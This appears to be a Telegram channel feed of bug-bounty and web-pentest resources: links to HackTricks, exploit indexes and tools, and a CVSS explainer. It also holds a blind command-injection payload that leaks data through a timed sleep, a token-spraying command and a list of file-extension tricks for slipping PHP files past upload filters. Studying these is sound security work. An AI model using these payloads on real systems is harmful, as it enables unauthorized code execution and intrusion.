GitBook
ctf, pentest, writeUps, osint, labs,
tips, GitBooks, Notion
Web pentest, bug bounty
https://pocorexp.nsa.im
lists all CVEs and public exploits
Forwarded from GitBook
HACKTRICKS

•Generic Methodologies & Resources
•Generic Hacking
•Linux Hardening
•MacOS Hardening
•Windows Hardening
•Mobile Pentesting
•Network Services Pentesting
•Pentesting Web
•Cloud Security
•Hardware/Physical Access
•Binary Exploitation
•AI
•Reversing & Exploiting
•Crypto & Stego
•TODO

Link 🔗:-
https://book.hacktricks.wiki/en/index.html

@GitBook_s
blind RCE payload + sleep
;if [  $( whoami | cut -c 1) = "d" ]; then sleep 10; fi
GitBook pinned «A Hacker's Notebook: Real Techniques from the World of Bug Bounty https://snapdragon-copper-dd1.notion.site/A-Hacker-s-Notebook-Real-Techniques-from-the-World-of-Bug-Bounty-20ea797be4c680e6b542c20a943782d6?pvs=73 By: @bugbountyhints http://GitBook_s.t.me»
Forwarded from Mr Soul
Hi world
CVSS V3 Cheat Sheet
@GitBook_s
🎯What is CVSS and why it is important?

🔐CVSS, or Common Vulnerability Scoring System, is a global standard for scoring the severity of security vulnerabilities.

When you find a vulnerability (for example, in a bug bounty or penetration test), you need to know how dangerous it is, what its impact is, and how quickly you need to react to it. That's where CVSS comes in! 🚨

---
📊 How does it work?

So CVSS gives each vulnerability a number between 0.0 and 10.0:

* 🔵 0.0–3.9 = Low
* 🟡 4.0–6.9 = Medium
* 🟠 7.0–8.9 = High
* 🔴 9.0–10.0 = Critical

This score is calculated based on 3 main metrics:

1. Base Score – the basic nature of the vulnerability

* Access required (local, network)
* Complexity of the exploit
* Authentication required
* Impact on confidentiality, integrity, availability

2. Temporal Score – Changes over time

🕐 Is there a public exploit?
🛠 Has a fix been provided?
📉 How reliable is the technical report?

3. Environmental Score – Impact in the specific environment

🏢 How important is the vulnerability to the specific organization or system?
🔧 Are some factors in the environment recoverable?

---
🛠 What are its uses?

* Patch Management prioritization
* Bug severity determination in bug bounty programs
* Professional reporting to organizations
* Risk analysis in information security teams
* Documentation and CVE Tracking

---

🧮 Where to use it?

🔗 Official CVSS v3.1 Calculator (https://www.first.org/cvss/calculator/3.1)

---

🧑‍💻 In short?

When you find a vulnerability, don't just say "it was dangerous"; give it a number with CVSS, make it comparable, and analyze it more professionally! 😎
WAF Bypass Arsenal - Full-Width Unicode Symbols Cheatsheet for XSS, CRLF & WAF Bypass: https://wafbypass.berrry.app/
CVE is a catalog of known software flaws, with each ID representing a specific vulnerability.

CWE, on the other hand, is a category system for software and hardware weaknesses that can lead to vulnerabilities.
CVE and CWE in Persian
Persian explanation

https://www.aparat.com/v/d015i58
You can use XSStrike for reflected and DOM XSS scanning.

🔹 multi-threaded crawling
🔹 WAF detection & evasion
🔹 outdated JS lib scanning
🔹 blind XSS support
🔹 bruteforce payloads from a file

#XSS

https://github.com/s0md3v/XSStrike
@GitBook_s
🕵️VeryLazyTech

Vulnerabilities and Exploits
Dorks
Resources
Pentesting Web
Linux
Windows
Network Pentesting
Post-exploitation
Technical guides

Link 🔗:-
https://www.verylazytech.com/

@GitBook_s
This is GitBook ...
nuclei -t token-spray/ -var token=keys.txt

https://github.com/streaak/keyhacks

#InfoDisclosure
@GitBook_s
Extension Bypass V2

🔸 do.php%00.png
🔸 do.php%0A.png
🔸 do.php\n.png
🔸 do.php\u000a.png
🔸 do.php\u560a.png
🔸 do.php%E5%98%8A.png
🔸 do.php#.png
🔸 do.php%23.png
🔸 do.php\u0023.png
🔸 do.php;.png
🔸 do.php%3B.png
🔸 do.php\u003b.png
🔸 do.php\u563b.png
🔸 do.php%E5%98%BB.png

@GitBook_s